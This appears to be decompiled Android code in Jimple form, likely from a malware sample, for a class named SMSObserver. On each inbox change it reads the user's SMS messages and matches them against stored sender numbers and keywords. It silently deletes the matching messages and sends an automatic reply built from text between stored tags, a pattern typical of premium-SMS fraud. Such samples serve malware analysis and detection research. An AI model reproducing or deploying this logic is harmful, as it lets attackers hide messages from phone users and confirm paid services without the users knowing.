public class com.xxx.yyy.SMSObserver extends android.database.ContentObserver
{
    private static final java.lang.String CONVERSATION_URI;
    public static final java.lang.String DB_NAME;
    private static final java.lang.String SMS_INBOX_URI;
    public static final java.lang.String TAG;
    public static final int VERSION;
    public java.lang.String ReturnMsg;
    public java.lang.String[] Tags;
    private android.content.ContentResolver contentResolver;
    private android.content.Context ctx;
    public java.util.List filterKeyList;
    public java.util.List filterMdnList;
    private com.xxx.yyy.SMSDatabaseHelper helper;

    public void <init>(android.os.Handler, android.content.Context)
    {
        com.xxx.yyy.SMSObserver r0;
        android.os.Handler r1;
        android.content.Context r2;
        android.content.ContentResolver $r3;
        com.xxx.yyy.SMSDatabaseHelper $r4, $r5, $r7, $r9;
        java.util.List $r6, $r8;
        java.lang.String[] $r10;

        r0 := @this: com.xxx.yyy.SMSObserver;
        r1 := @parameter0: android.os.Handler;
        r2 := @parameter1: android.content.Context;
        specialinvoke r0.<android.database.ContentObserver: void <init>(android.os.Handler)>(r1);
        r0.<com.xxx.yyy.SMSObserver: android.content.Context ctx> = r2;
        $r3 = virtualinvoke r2.<android.content.Context: android.content.ContentResolver getContentResolver()>();
        r0.<com.xxx.yyy.SMSObserver: android.content.ContentResolver contentResolver> = $r3;
        $r4 = new com.xxx.yyy.SMSDatabaseHelper;
        specialinvoke $r4.<com.xxx.yyy.SMSDatabaseHelper: void <init>(android.content.Context,java.lang.String,android.database.sqlite.SQLiteDatabase$CursorFactory,int)>(r2, "css_db", null, 3);
        r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper> = $r4;
        $r5 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r6 = virtualinvoke $r5.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 0);
        r0.<com.xxx.yyy.SMSObserver: java.util.List filterMdnList> = $r6;
        $r7 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r8 = virtualinvoke $r7.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 1);
        r0.<com.xxx.yyy.SMSObserver: java.util.List filterKeyList> = $r8;
        $r9 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r10 = virtualinvoke $r9.<com.xxx.yyy.SMSDatabaseHelper: java.lang.String[] getBackContent()>();
        r0.<com.xxx.yyy.SMSObserver: java.lang.String[] Tags> = $r10;
        r0.<com.xxx.yyy.SMSObserver: java.lang.String ReturnMsg> = "y";
        return;
    }

    private boolean FindReturnMsg(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.SMSObserver r0;
        java.lang.String r1, r2, $r4, $r6, $r8, $r10, $r13, $r14;
        int i0, i1, i2, i3, i4, i5;
        java.lang.String[] $r3, $r5, $r7, $r9;
        com.xxx.yyy.ssmm $r11;
        android.content.Context $r12;

        r0 := @this: com.xxx.yyy.SMSObserver;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        i0 = virtualinvoke r2.<java.lang.String: int length()>();
        $r3 = r0.<com.xxx.yyy.SMSObserver: java.lang.String[] Tags>;
        $r4 = $r3[0];
        i1 = virtualinvoke $r4.<java.lang.String: int length()>();
        $r5 = r0.<com.xxx.yyy.SMSObserver: java.lang.String[] Tags>;
        $r6 = $r5[1];
        i2 = virtualinvoke $r6.<java.lang.String: int length()>();
        if i1 != 0 goto label0;

        if i2 != 0 goto label0;

        return 0;

     label0:
        i3 = 0;
        if i1 <= 0 goto label2;

        $r7 = r0.<com.xxx.yyy.SMSObserver: java.lang.String[] Tags>;
        $r8 = $r7[0];
        i4 = virtualinvoke r2.<java.lang.String: int indexOf(java.lang.String)>($r8);
        if i4 != -1 goto label1;

        return 0;

     label1:
        i3 = i4 + i1;

     label2:
        if i2 <= 0 goto label4;

        $r9 = r0.<com.xxx.yyy.SMSObserver: java.lang.String[] Tags>;
        $r10 = $r9[1];
        i5 = virtualinvoke r2.<java.lang.String: int indexOf(java.lang.String)>($r10);
        if i5 != -1 goto label3;

        return 0;

     label3:
        i0 = i5;

     label4:
        if i0 >= i3 goto label5;

        return 0;

     label5:
        if i0 != i3 goto label7;

        r0.<com.xxx.yyy.SMSObserver: java.lang.String ReturnMsg> = "y";

     label6:
        $r11 = new com.xxx.yyy.ssmm;
        specialinvoke $r11.<com.xxx.yyy.ssmm: void <init>()>();
        $r12 = r0.<com.xxx.yyy.SMSObserver: android.content.Context ctx>;
        $r13 = r0.<com.xxx.yyy.SMSObserver: java.lang.String ReturnMsg>;
        virtualinvoke $r11.<com.xxx.yyy.ssmm: void Gef(android.content.Context,java.lang.String,java.lang.String)>($r12, r1, $r13);
        return 1;

     label7:
        $r14 = virtualinvoke r2.<java.lang.String: java.lang.String substring(int,int)>(i3, i0);
        r0.<com.xxx.yyy.SMSObserver: java.lang.String ReturnMsg> = $r14;
        goto label6;
    }

    public static java.util.List buildSMSEntity(android.database.Cursor)
    {
        android.database.Cursor r0;
        java.util.ArrayList r1;
        com.xxx.yyy.SMSEntity r2;
        boolean $z0;
        long $l0, $l1;
        java.lang.String $r3, $r4, $r5, $r6, $r7, $r8, $r9, $r10, $r11;
        int $i2, $i3;

        r0 := @parameter0: android.database.Cursor;
        r1 = new java.util.ArrayList;
        specialinvoke r1.<java.util.ArrayList: void <init>(int)>(10);

     label0:
        $z0 = interfaceinvoke r0.<android.database.Cursor: boolean moveToNext()>();
        if $z0 != 0 goto label1;

        return r1;

     label1:
        r2 = new com.xxx.yyy.SMSEntity;
        specialinvoke r2.<com.xxx.yyy.SMSEntity: void <init>()>();
        $l0 = interfaceinvoke r0.<android.database.Cursor: long getLong(int)>(0);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setId(long)>($l0);
        $l1 = interfaceinvoke r0.<android.database.Cursor: long getLong(int)>(1);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setThreadID(long)>($l1);
        $r3 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(2);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setFrom(java.lang.String)>($r3);
        $r4 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(3);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setPerson(java.lang.String)>($r4);
        $r5 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(4);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setDate(java.lang.String)>($r5);
        $r6 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(5);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setProtocol(java.lang.String)>($r6);
        $i2 = interfaceinvoke r0.<android.database.Cursor: int getInt(int)>(6);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setRead(int)>($i2);
        $i3 = interfaceinvoke r0.<android.database.Cursor: int getInt(int)>(7);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setStatus(int)>($i3);
        $r7 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(8);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setType(java.lang.String)>($r7);
        $r8 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(9);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setReplyPathPresent(java.lang.String)>($r8);
        $r9 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(10);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setSubject(java.lang.String)>($r9);
        $r10 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(11);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setBody(java.lang.String)>($r10);
        $r11 = interfaceinvoke r0.<android.database.Cursor: java.lang.String getString(int)>(12);
        virtualinvoke r2.<com.xxx.yyy.SMSEntity: void setServiceCenter(java.lang.String)>($r11);
        interfaceinvoke r1.<java.util.List: boolean add(java.lang.Object)>(r2);
        goto label0;
    }

    private int deleteSpecSMS(java.util.List)
    {
        com.xxx.yyy.SMSObserver r0;
        java.util.List r1;
        int i0;
        java.lang.String[] r2;
        java.lang.StringBuilder r3, $r8;
        long l1, $l2;
        android.net.Uri r4;
        java.util.Iterator r5;
        boolean $z0;
        java.lang.Object $r6;
        com.xxx.yyy.SMSEntity $r7;
        java.lang.String $r9, $r11;
        android.content.ContentResolver r10;

        r0 := @this: com.xxx.yyy.SMSObserver;
        r1 := @parameter0: java.util.List;
        i0 = 0;
        r5 = interfaceinvoke r1.<java.util.List: java.util.Iterator iterator()>();

     label0:
        $z0 = interfaceinvoke r5.<java.util.Iterator: boolean hasNext()>();
        if $z0 != 0 goto label1;

        return i0;

     label1:
        r2 = newarray (java.lang.String)[1];
        $r6 = interfaceinvoke r5.<java.util.Iterator: java.lang.Object next()>();
        $r7 = (com.xxx.yyy.SMSEntity) $r6;
        r3 = new java.lang.StringBuilder;
        specialinvoke r3.<java.lang.StringBuilder: void <init>(java.lang.String)>("content://sms/conversations/");
        l1 = virtualinvoke $r7.<com.xxx.yyy.SMSEntity: long getThreadID()>();
        $r8 = virtualinvoke r3.<java.lang.StringBuilder: java.lang.StringBuilder append(long)>(l1);
        $r9 = virtualinvoke $r8.<java.lang.StringBuilder: java.lang.String toString()>();
        r4 = staticinvoke <android.net.Uri: android.net.Uri parse(java.lang.String)>($r9);
        r10 = r0.<com.xxx.yyy.SMSObserver: android.content.ContentResolver contentResolver>;
        $l2 = virtualinvoke $r7.<com.xxx.yyy.SMSEntity: long getId()>();
        $r11 = staticinvoke <java.lang.String: java.lang.String valueOf(long)>($l2);
        r2[0] = $r11;
        virtualinvoke r10.<android.content.ContentResolver: int delete(android.net.Uri,java.lang.String,java.lang.String[])>(r4, "_id=?", r2);
        i0 = i0 + 1;
        goto label0;
    }

    private java.util.List filterSMSEntity(java.util.List)
    {
        com.xxx.yyy.SMSObserver r0;
        java.util.List r1, $r9, $r10;
        java.util.ArrayList r2;
        boolean z0, $z1, $z2, $z3, $z4, $z6, $z8;
        com.xxx.yyy.SMSEntity r3;
        java.util.Iterator r4, r7, r11;
        java.lang.String r5, r6, $r12, $r13, r18, r19;
        java.lang.Object $r8, $r14, $r16;
        com.xxx.yyy.SMSEntityBad $r15, $r17;

        r0 := @this: com.xxx.yyy.SMSObserver;
        r1 := @parameter0: java.util.List;
        r2 = new java.util.ArrayList;
        specialinvoke r2.<java.util.ArrayList: void <init>()>();
        z0 = 0;
        r7 = interfaceinvoke r1.<java.util.List: java.util.Iterator iterator()>();

     label0:
        $z1 = interfaceinvoke r7.<java.util.Iterator: boolean hasNext()>();
        if $z1 != 0 goto label1;

        return r2;

     label1:
        $r8 = interfaceinvoke r7.<java.util.Iterator: java.lang.Object next()>();
        r3 = (com.xxx.yyy.SMSEntity) $r8;
        $r9 = r0.<com.xxx.yyy.SMSObserver: java.util.List filterMdnList>;
        r4 = interfaceinvoke $r9.<java.util.List: java.util.Iterator iterator()>();

     label2:
        $z2 = interfaceinvoke r4.<java.util.Iterator: boolean hasNext()>();
        if $z2 != 0 goto label6;

     label3:
        if z0 != 0 goto label0;

        $r10 = r0.<com.xxx.yyy.SMSObserver: java.util.List filterKeyList>;
        r11 = interfaceinvoke $r10.<java.util.List: java.util.Iterator iterator()>();

     label4:
        $z3 = interfaceinvoke r11.<java.util.Iterator: boolean hasNext()>();
        if $z3 != 0 goto label7;

     label5:
        if z0 != 0 goto label0;

        $r12 = virtualinvoke r3.<com.xxx.yyy.SMSEntity: java.lang.String getFrom()>();
        $r13 = virtualinvoke r3.<com.xxx.yyy.SMSEntity: java.lang.String getBody()>();
        $z4 = specialinvoke r0.<com.xxx.yyy.SMSObserver: boolean FindReturnMsg(java.lang.String,java.lang.String)>($r12, $r13);
        if $z4 == 0 goto label0;

        interfaceinvoke r2.<java.util.List: boolean add(java.lang.Object)>(r3);
        goto label0;

     label6:
        $r14 = interfaceinvoke r4.<java.util.Iterator: java.lang.Object next()>();
        $r15 = (com.xxx.yyy.SMSEntityBad) $r14;
        r5 = virtualinvoke r3.<com.xxx.yyy.SMSEntity: java.lang.String getFrom()>();
        r6 = virtualinvoke $r15.<com.xxx.yyy.SMSEntityBad: java.lang.String getKeyWord()>();
        $z6 = virtualinvoke r5.<java.lang.String: boolean contains(java.lang.CharSequence)>(r6);
        if $z6 == 0 goto label2;

        interfaceinvoke r2.<java.util.List: boolean add(java.lang.Object)>(r3);
        z0 = 1;
        goto label3;

     label7:
        $r16 = interfaceinvoke r11.<java.util.Iterator: java.lang.Object next()>();
        $r17 = (com.xxx.yyy.SMSEntityBad) $r16;
        r18 = virtualinvoke r3.<com.xxx.yyy.SMSEntity: java.lang.String getBody()>();
        r19 = virtualinvoke $r17.<com.xxx.yyy.SMSEntityBad: java.lang.String getKeyWord()>();
        $z8 = virtualinvoke r18.<java.lang.String: boolean contains(java.lang.CharSequence)>(r19);
        if $z8 == 0 goto label4;

        interfaceinvoke r2.<java.util.List: boolean add(java.lang.Object)>(r3);
        z0 = 1;
        goto label5;
    }

    public void ReflashDb()
    {
        com.xxx.yyy.SMSObserver r0;
        com.xxx.yyy.SMSDatabaseHelper $r1, $r3;
        java.util.List $r2, $r4;

        r0 := @this: com.xxx.yyy.SMSObserver;
        $r1 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r2 = virtualinvoke $r1.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 0);
        r0.<com.xxx.yyy.SMSObserver: java.util.List filterMdnList> = $r2;
        $r3 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r4 = virtualinvoke $r3.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 1);
        r0.<com.xxx.yyy.SMSObserver: java.util.List filterKeyList> = $r4;
        return;
    }

    public void insertSms(java.lang.String, int, int)
    {
        com.xxx.yyy.SMSObserver r0;
        java.lang.String r1;
        int i0, i1;
        com.xxx.yyy.SMSDatabaseHelper $r2, $r3;

        r0 := @this: com.xxx.yyy.SMSObserver;
        r1 := @parameter0: java.lang.String;
        i0 := @parameter1: int;
        i1 := @parameter2: int;
        $r2 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        virtualinvoke $r2.<com.xxx.yyy.SMSDatabaseHelper: int deleteSMS(java.lang.String)>(r1);
        $r3 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        virtualinvoke $r3.<com.xxx.yyy.SMSDatabaseHelper: int insertRecord(java.lang.String,int,int)>(r1, i1, i0);
        return;
    }

    public void onChange(boolean)
    {
        com.xxx.yyy.SMSObserver r0;
        boolean z0;
        java.lang.String[] r1;
        android.content.Context $r2;
        android.content.ContentResolver $r3, $r5;
        android.net.Uri r4;
        android.database.Cursor $r6;
        java.util.List $r7, $r8;

        r0 := @this: com.xxx.yyy.SMSObserver;
        z0 := @parameter0: boolean;
        specialinvoke r0.<android.database.ContentObserver: void onChange(boolean)>(z0);
        $r2 = r0.<com.xxx.yyy.SMSObserver: android.content.Context ctx>;
        $r3 = virtualinvoke $r2.<android.content.Context: android.content.ContentResolver getContentResolver()>();
        r0.<com.xxx.yyy.SMSObserver: android.content.ContentResolver contentResolver> = $r3;
        r4 = staticinvoke <android.net.Uri: android.net.Uri parse(java.lang.String)>("content://sms//inbox");
        r1 = newarray (java.lang.String)[1];
        r1[0] = "_id,thread_id,address,person,date,protocol,read,status,type,reply_path_present,subject,body,service_center";
        $r5 = r0.<com.xxx.yyy.SMSObserver: android.content.ContentResolver contentResolver>;
        $r6 = virtualinvoke $r5.<android.content.ContentResolver: android.database.Cursor query(android.net.Uri,java.lang.String[],java.lang.String,java.lang.String[],java.lang.String)>(r4, r1, null, null, "date desc");
        $r7 = staticinvoke <com.xxx.yyy.SMSObserver: java.util.List buildSMSEntity(android.database.Cursor)>($r6);
        $r8 = specialinvoke r0.<com.xxx.yyy.SMSObserver: java.util.List filterSMSEntity(java.util.List)>($r7);
        specialinvoke r0.<com.xxx.yyy.SMSObserver: int deleteSpecSMS(java.util.List)>($r8);
        return;
    }

    public void setTags(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.SMSObserver r0;
        java.lang.String r1, r2;
        com.xxx.yyy.SMSDatabaseHelper $r3, $r4, $r5;
        java.lang.String[] $r6;

        r0 := @this: com.xxx.yyy.SMSObserver;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        $r3 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        virtualinvoke $r3.<com.xxx.yyy.SMSDatabaseHelper: int deleteBackRecord()>();
        $r4 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        virtualinvoke $r4.<com.xxx.yyy.SMSDatabaseHelper: int insertBackRecord(java.lang.String,java.lang.String)>(r1, r2);
        $r5 = r0.<com.xxx.yyy.SMSObserver: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r6 = virtualinvoke $r5.<com.xxx.yyy.SMSDatabaseHelper: java.lang.String[] getBackContent()>();
        r0.<com.xxx.yyy.SMSObserver: java.lang.String[] Tags> = $r6;
        return;
    }
}
